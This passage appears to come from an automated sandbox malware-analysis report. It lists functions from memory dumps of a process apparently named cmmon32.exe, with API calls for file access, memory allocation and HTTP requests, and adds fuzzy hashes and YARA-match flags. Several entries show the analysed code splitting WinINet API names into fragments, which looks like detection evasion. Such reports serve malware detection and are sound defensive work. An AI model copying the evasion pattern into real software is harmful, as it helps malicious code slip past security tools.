Function 01A29A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b2932b825459157c11d8d3a56667631af8db034e987ebfcb85219ac3d7d1e5
Instruction ID: 9d4209ec36ad9b86c711900e913d8742e076001c54cab53c806cf2a0570db572
Opcode Fuzzy Hash: c1b2932b825459157c11d8d3a56667631af8db034e987ebfcb85219ac3d7d1e5
Instruction Fuzzy Hash: C290027121140442D10061A948087570005A7D0343F91C011B5154555EC6A5C8A17571

Uniqueness

Uniqueness Score: -1.00%

Function 01A29610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af25917bfdbdec8b31d9d2ed300f16d30f58161f5e262938017c10dd4bb6574
Instruction ID: d353f4030c101fb646311ff87c7ba36c494af104aae50577a64fa72abe75691e
Opcode Fuzzy Hash: 6af25917bfdbdec8b31d9d2ed300f16d30f58161f5e262938017c10dd4bb6574
Instruction Fuzzy Hash: A690027161500842D15071A944147560005A7D0342F91C011B0014654DC7958A6576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01A29650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d430808c93f2019afd54586b502e1bfbe24b78365d26f3cf9764f751a30099c5
Instruction ID: f82cb60578a6b5a64c6d8cb09a8994c2ef03bf5d47fae8b6539deead80c18509
Opcode Fuzzy Hash: d430808c93f2019afd54586b502e1bfbe24b78365d26f3cf9764f751a30099c5
Instruction Fuzzy Hash: 3890027121504882D14071A94404B560015A7D0346F91C011B0054694DD6658D65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01A29670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 74d6a20b3bda43498382b2e7c7fe4e287db6ca0c247c111e3ed0d34be9869ab3
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01A7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01A7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E01A2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01A75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01A75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x01a7fdda
0x01a7fde2
0x01a7fde5
0x01a7fdec
0x01a7fdfa
0x01a7fdff
0x01a7fe0a
0x01a7fe0f
0x01a7fe17
0x01a7fe1e
0x01a7fe19
0x01a7fe19
0x01a7fe19
0x01a7fe20
0x01a7fe21
0x01a7fe22
0x01a7fe25
0x01a7fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A7FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A7FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A7FE01

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: f27a44b873ea3f214139bc4cb79e73b738402279da9bd462ecdc16f528076187
Instruction ID: d35cd1d6e29e763750101b12798401bf73d8b5be37f70789fc1071cf3eb233fa
Opcode Fuzzy Hash: f27a44b873ea3f214139bc4cb79e73b738402279da9bd462ecdc16f528076187
Instruction Fuzzy Hash: 60F0F672600601BFEA201B55DD02F23BF6AEB84B30F144714F628565D1DA62FA2097F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exe PID: 2904 Parent PID: 3440 cmmon32.exeCOMMON

Executed Functions

Function 007881C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00783B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00783B97,007A002E,00000000,00000060,00000000,00000000), ref: 0078820D

Strings

.z`, xrefs: 007881FD, 00788208

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e6aa20255aec8f379c61103cbc5363be17cf32e86a56498a2495d6557a6c1f91
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 16F0B6B2200108ABCB48DF88DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 007882F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(0=x,?,?,00783D30,00000000,FFFFFFFF), ref: 00788315

Strings

0=x, xrefs: 0078830C, 00788314

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: 0=x
API String ID: 3535843008-4011625778
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 3531fb84df6bf0ffa47f24faaa1cf495938a1d14fc35b49d2ab66f93532777e9
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: B3D01776240214ABD710EF98CC89EA77BADEF48760F154499BA189B282C930FA0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00788270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00783A11,?,?,?,?,00783A11,FFFFFFFF,?,R=x,?,00000000), ref: 007882B5

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 80f73ed1b6f0d54f8999fa0987fef2e6f6d3c0fe6a38430a370bed014a19051d
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: BEF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007883A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00772D11,00002000,00003000,00000004), ref: 007883D9

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 3a1d18b5ee3f98d9cdc001cac8543b55238ccd7dbc10f7ba95ec271027574f32
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 09F015B2200208ABCB14DF89CC81EAB77ADAF8C750F118548FE0897241CA30F810CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0078839A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00772D11,00002000,00003000,00000004), ref: 007883D9

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c069605bea791753a6f034d14a1db44d3d73d1e04d665a1597b8ecdeaab80109
Instruction ID: efce65211ade479144b3e234fea26c4a44cad95b220cb5010f061cc466333ca6
Opcode Fuzzy Hash: c069605bea791753a6f034d14a1db44d3d73d1e04d665a1597b8ecdeaab80109
Instruction Fuzzy Hash: 3BF082B11041456BCB04DF98DC84CABB7A9AF88310B148A5DF94C97203C634D815C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 04A19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1986A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3274ff08fad5445d8b5f4960b00825c898c87fe709e03f151d907e3fb007b927
Instruction ID: 2a6b7d5643fb9f3dc5f0ae8082c9f128cd9fca4eaa5b6c0aa12f29dddcdae70d
Opcode Fuzzy Hash: 3274ff08fad5445d8b5f4960b00825c898c87fe709e03f151d907e3fb007b927
Instruction Fuzzy Hash: C190027120101413F111616D4604707000997D0295FA1C412E4415558E9696D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04A19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1984A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c446aa1ad546e8555bdba10c626d4d826b8d104c31f5e6d153de1a0cd373af52
Instruction ID: 5ae2fb152bfeea99849b0d6f319362ca08b56afbabafa326496ffd0b45316148
Opcode Fuzzy Hash: c446aa1ad546e8555bdba10c626d4d826b8d104c31f5e6d153de1a0cd373af52
Instruction Fuzzy Hash: 93900261242051527545B16D45045074006A7E02957A1C012E5405950D8566E856F661

Uniqueness

Uniqueness Score: -1.00%

Function 04A199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A199AA

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 217ca3a44c12b412071cdba20ebf1e33900328b9962c224126fea56264ddb6d2
Instruction ID: 45cbe42c6b37b17d11530141a08b1b940f8c06f95d224a1801ed3dbd3245254f
Opcode Fuzzy Hash: 217ca3a44c12b412071cdba20ebf1e33900328b9962c224126fea56264ddb6d2
Instruction Fuzzy Hash: 439002A134101442F100616D4514B060005D7E1355F61C015E5055554E8659DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04A195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A195DA

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f174ab494a59d89781e0ac672936c3b1ab5fa1eb940f714b198ec250641725b
Instruction ID: 5f64ef5aa64c4709049d81e4e93a40ff4d67d973e0eceab3e7f771b759dcac1d
Opcode Fuzzy Hash: 7f174ab494a59d89781e0ac672936c3b1ab5fa1eb940f714b198ec250641725b
Instruction Fuzzy Hash: F89002A1202010036105716D4514616400A97E0255B61C021E5005590EC565D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04A19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1991A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eac7373687433a0a4877fa681fced214d3693bd68e59b9ad9d365661c7d573bc
Instruction ID: af841b624ec79f189f7599b9c5450eb1af4b5e31bcd2d4edc7d56995b3d3de8a
Opcode Fuzzy Hash: eac7373687433a0a4877fa681fced214d3693bd68e59b9ad9d365661c7d573bc
Instruction Fuzzy Hash: EF9002B120101402F140716D4504746000597D0355F61C011E9055554F8699DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04A19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1954A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acde29405100115e9489b6daa2c25784c6101062de79739d10ff4f8dba351bd6
Instruction ID: c0f1176c01547556e1ad202367199fe2da9e9e23a68db2ad4565923a501269f2
Opcode Fuzzy Hash: acde29405100115e9489b6daa2c25784c6101062de79739d10ff4f8dba351bd6
Instruction Fuzzy Hash: 56900265211010032105A56D0704507004697D53A5361C021F5006550DD661D8617161

Uniqueness

Uniqueness Score: -1.00%

Function 04A196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A196EA

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3345f665e3376d400415f13cdc7115cb0057b88f1056f52d6eb63f5a5f4bb37
Instruction ID: 2b293ca695baa82870a784ffddf24c4ce9594e56a4bbc7e9a486e6846f6180d0
Opcode Fuzzy Hash: b3345f665e3376d400415f13cdc7115cb0057b88f1056f52d6eb63f5a5f4bb37
Instruction Fuzzy Hash: 7A90027120109802F110616D850474A000597D0355F65C411E8415658E86D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04A196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A196DA

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 460e4a96f90e861921f6264110efb09fb5a068dc5275b99f505081aba2cc7e3f
Instruction ID: 2d6251827ed5eb31b27063964b722b5108f674021cf60e73da885388010d5aab
Opcode Fuzzy Hash: 460e4a96f90e861921f6264110efb09fb5a068dc5275b99f505081aba2cc7e3f
Instruction Fuzzy Hash: E490027120101842F100616D4504B46000597E0355F61C016E4115654E8655D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04A19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1966A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d249a5700204b7c64205fd86aad81fd6cce55b653fcebe046d5898f4c5818df5
Instruction ID: 1038e3baf1143815dbe91590cb0c026487d20f20d5c42f603578e2cb37c8b9e0
Opcode Fuzzy Hash: d249a5700204b7c64205fd86aad81fd6cce55b653fcebe046d5898f4c5818df5
Instruction Fuzzy Hash: 3490027120101802F180716D450464A000597D1355FA1C015E4016654ECA55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04A19650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1965A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6510cc6d9384427da2e9cdd6ef5c8ed0161053d15f32b96f4c8cde453b03800e
Instruction ID: 5a162e580a62e31831ae6b23e58e45234410f20c0a1dcf188a817da919974d2c
Opcode Fuzzy Hash: 6510cc6d9384427da2e9cdd6ef5c8ed0161053d15f32b96f4c8cde453b03800e
Instruction Fuzzy Hash: 5690027120505842F140716D4504A46001597D0359F61C011E4055694E9665DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04A19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A19A5A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9547c5665e69ab4c23c09bc2c7f1f2119172e980550c7767e7236f7ebbe032b0
Instruction ID: fa11ad043248154e2eed72a7eec0d55a7e261ae2839083a7c7354a50afefe11d
Opcode Fuzzy Hash: 9547c5665e69ab4c23c09bc2c7f1f2119172e980550c7767e7236f7ebbe032b0
Instruction Fuzzy Hash: 3290026121181042F200657D4D14B07000597D0357F61C115E4145554DC955D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04A19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1978A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 875190bd572fa7393382e61e07b5cb0b146d795f6a6cd28396552b56a39b130d
Instruction ID: edefb7861a68ce68e27b9086e79c4d6a7132d5ae3c649e020017d9364a3d1c40
Opcode Fuzzy Hash: 875190bd572fa7393382e61e07b5cb0b146d795f6a6cd28396552b56a39b130d
Instruction Fuzzy Hash: ED90026921301002F180716D550860A000597D1256FA1D415E4006558DC955D8697361

Uniqueness

Uniqueness Score: -1.00%

Function 04A19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A19FEA

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a310ba1caa48eef445efc5f2cba7c6c56f92c633f71d5d30c6f445998938e3d
Instruction ID: d637db7e69a4a0cf4c4b945a9eea325f92c813fc3fc06c4ec67d3eecb4af7ca1
Opcode Fuzzy Hash: 1a310ba1caa48eef445efc5f2cba7c6c56f92c633f71d5d30c6f445998938e3d
Instruction Fuzzy Hash: F390027131115402F110616D8504706000597D1255F61C411E4815558E86D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04A19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A1971A

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b42c0898974669a24ea416e1cfb4a39b44b9eee2470e0e24e9531ef6cb48e41a
Instruction ID: 0803078fb48c575d2e637107edc6e1f3eb44b507777be916dcfbbf1c2f009a72
Opcode Fuzzy Hash: b42c0898974669a24ea416e1cfb4a39b44b9eee2470e0e24e9531ef6cb48e41a
Instruction Fuzzy Hash: 8790027120101402F10065AD5508646000597E0355F61D011E9015555FC6A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 007888D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00788938

Strings

HttpOpenRequestA, xrefs: 0078892A, 00788935
Open, xrefs: 007888F1
RequestA, xrefs: 00788932, 00788937
estA, xrefs: 007888FF
OpenRequestA, xrefs: 0078892E, 00788936
Http, xrefs: 007888EA
HttpOpenRequestA, xrefs: 007888DD
Requ, xrefs: 007888F8

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: 1d40c88111c7586b93960abacc20f40e83a2f4d291cb854a517df3dfcb9662a2
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 6C01E9B2905119AFCB04DF98D841DEF7BB9EB48210F158288FD48A7205D634ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00788950, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 007889AC

Strings

RequestA, xrefs: 007889A6, 007889AB
SendRequestA, xrefs: 007889A2, 007889AA
Requ, xrefs: 00788978
HttpSendRequestA, xrefs: 0078899E, 007889A9
Send, xrefs: 00788971
Http, xrefs: 0078896A
estA, xrefs: 0078897F
HttpSendRequestA, xrefs: 0078895D

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 04a33458dc40f4c89ee2f1646c096827ec737bd3ec292b52cf903e33131d008e
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: A6014FB2905119AFCB00DF98D8459BF7BB8EB44210F148189FD08A7304D670EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00788850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 007888B8

Strings

rnetConnectA, xrefs: 007888AE, 007888B6
ectA, xrefs: 0078887F
ConnectA, xrefs: 007888B2, 007888B7
Conn, xrefs: 00788878
rnet, xrefs: 00788871
Inte, xrefs: 0078886A
InternetConnectA, xrefs: 007888AA, 007888B5

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 664248b76f3e8bc193772234b751fe12a553c683a5de7b220d93c09d0328cd34
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: 7D01E9B2915118AFCB14DF99D941EEF77B9EB48310F154289BE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 007887E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00788837

Strings

InternetOpenA, xrefs: 0078882D, 00788835
rnetOpenA, xrefs: 00788831, 00788836
Open, xrefs: 00788808
A, xrefs: 0078880F
Inte, xrefs: 007887FA
rnet, xrefs: 00788801

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 2caac617a1bc9c0ebf13c55d94e491dc6d453dfc751ce47c1c1e820297dd2c1f
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 8CF019B2911118AF8B14EF98DC419FBB7B8EF48310B048589BE1897301D634AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00777207, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007772BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007772DB

Strings

3333, xrefs: 0077721E

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
